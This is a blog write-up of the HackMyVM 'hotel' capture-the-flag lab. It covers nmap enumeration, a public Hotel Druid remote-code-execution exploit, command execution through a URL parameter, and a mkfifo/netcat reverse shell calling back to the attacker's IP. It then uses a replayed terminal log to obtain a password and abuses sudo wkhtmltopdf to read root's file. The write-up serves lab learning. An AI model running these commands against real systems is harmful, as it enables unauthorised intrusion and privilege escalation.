Skip to content
hackmyvm hotel

Hackmyvm Hotel Write-Up

Published by tomkraz on 27 February 2022

Background

The free CTF Challenge web site “hackmyvm.eu” have another easy level vm called ‘hotel’ for us to download, enumerate and get some flags. Although it might be marked as easy level, I did have some trouble with one tricky part. Yet, even though I had some issues I thoroughly enjoyed this CTF Challenge. Below you find my write-up and my process on how I went through this CTF Challenge.

So lets get into it.

Setup and Enumeration

The vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.

For enumeration of the hackmyvm hotel Challenge I will be using my BackArch system build that I created in previous blog post. You can use any Kali, BlackArch, Parrot or just standard Linux to proceed.

As usual nmap should be used to scan down everything. 

nmap -p- -T5 192.168.186.22

This results in finding a http server running on Port 80

Lets look a bit closer at this http service and enumerate it some more. 

nmap -sV -sC -p 80 192.168.186.22
  • sV for service detection and –sC for default scripts.

So nmap reveled something called Hotel Druid. Opening it up in Firefox shows something I have not come across before.

Investigating the software

It’s an Open Source hotel-room booking software called Hotel Druid.

I will take a guess that its got a security hole that will allow me to somehow gain a foothold. The best place to check for known exploits for software is at is at exploit-db.

A search for Hotel Druid exploits shows that there is indeed a remote vulnerability. These RCE are some of the worse ones. Also there is a downloadable exploit written in Python which we can use.

Have a read of the exploit and download the to the system you are enumeration from.

Finding a foothold

Run the script against the IP you have for this vm. In my case its 192.168.186.22 but it will be different for you depending on your VirtualBox set up.. 

python ./druid_exploit.py -t http://192.168.186.22 --noauth

After executing the script I can see it exploits that new room function in Hotel Druid to create a RCE exploit which allows us a run a command via a url on the system. I have ran this via Firefox a few times and it does work. However when creating the reverse shell it seems to be more reliable to do it with a “curl” command so I will proceed with that. 

curl "http://192.168.186.22/dati/selectappartamenti.php?cmd=whoami"

After the command “whoami” ran successfully, I can move to the next stage and get a reverse shell.

Reverse Shell

In order to get a reverse shell, I need to break this down into 2 parts.

  • Run the command that will spawn a reverse shell.
  • Run a “netcat” listener so we can catch a reverse shell.

Open two terminal windows and in the first one we have to have “netcat” running. 

nc -vlnp 1234

In the second terminal we will use “curl” to spawn the reverse shell. Now I some issues with this just using the command to spawn a shell and I had to encode the command in “burpsuite” to be of type url. After encoding I was able to move forward.

Below is the command to create a reverse shell using a IP address of my enumeration system where I am running “netcat“.

rm /tmp/f;mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1 ? nc 192.168.186.150 1234 >/tmp/f

so copy and paste all that into your second terminal.

All going well on your first terminal where “netcat” was running, you should now have a reverse shell. Now the shell needs to be stabilized as a newly spawned reverse shell does not work like a normal shell. We need to do some work to convert it to something usable.

 python3 -c 'pty;pty.spawn("/bin/bash")
export TERM=xterm
Ctrl z
stty raw -echo; fg

Now we have a nice usable bash shell that behaves like we expect.

More Enumeration

Now this is where I got stuck for a few hours. It took me a while to track down the next progression., Finally I got lucky and figured it out. There was a small element of a puzzle about this step.

After some time of Enumeration of the system I found some points of interest.

  • /etc/passwd has a user that can login called “person”.
  • The user “person”, owns all the files that that are running the Hotel Druid software.
  • There is a strange file called /var/www/html/ttylog.
  • I ran LINpeas against the system and found no useful exploits.
  • There is a file in user “person” home directory called /home/person/user.txt.

Reviewing our findings

So based on the above I some points to places to focus on.

The file “/home/person/user.txt” is, I presume, the user flag. But the permissions are tight and it doesn’t allow my reverse shell to read it ‘yet’.

The file that looked out of place “/var/www/http/ttylog” was unusual. Running “file” on it returned it was a data file and running “strings” on the file showed me that “strings” command was not installed on the vm so I had to copy this file locally to my BlackArch system. Once copied I could run “strings” on it.

Ok! Looking at the output from “strings“, this file is definitely something to do with the “person” user but what is the file? I puzzled over this one for a while and after some googling I found success. It was actually the output from a tool called ttyrec. This was a new tool that I had no knowledge of. Once I got this far then it was easy to play back the file as the tool to replay these files “ttyplay” was already installed on the vm. I will show the command but not the output. I have to give you something to do!

ttyplay /var/www/html/ttylog

Getting the user flag

So now we have the password for the person user. We can login or run “su – person” on our reverse shell and input this reveled password. The file /home/person/user.txt can now be read and entered into the hackmyvm hotel website for validation. 

cat /home/person/user.txt

Getting the root flag

Now to some enumeration as the “person” user. One of the first commands to run when enumerating a user account is “sudo -l“. This gives use some interesting output. 

sudo -l

So the output of “sudo -l” shows that command “wkhtmltopdf” can be run with root permissions. “wkhtmltopdf” is a command that, contrary to its name, can covert most text files to pdf files. Due to the sudo permissions it can also turn and file owned by root into a pdf as well. Taking a guess, based on the name of the user flag, I can surmise that the name of the root flag is /root/root.txt and so running the below command I can read the root flag into a pdf file. 

wkhtmltopdf /root/root.txt /tmp/root.pdf

Now all thats left is to copy the file to your local enumeration system and open it with a pdf viewer.

Well done, now you have the file flag and you can verify it on the hackmyvm hotel web site.

Conclusion

I enjoyed this CTF challenge a lot as it was fun to enumerate and capture the flags. For learners this type of CTF is perfect as it forces the basics of enumeration (nmap) and makes the challenger to go online and do some research to find exploits. To me this is exactly whats required for new learners so they can progress at this sport. I am not such a big fan of puzzle types of CTF challenges and even though this had some elements of puzzles, there was lots of learning in between and it was a great balance. Well done to the author.

It was not clear to me if root shell is required but I managed to capture all the flags without it. Leave some comment below if you think root shell is absolutely required or just nice to have.

I hope you enjoyed my write-up of “hackmyvm hotel” Challenge.

Published inCTFGetting Started With CTF Challengeshackmyvm.eu

Comments are closed.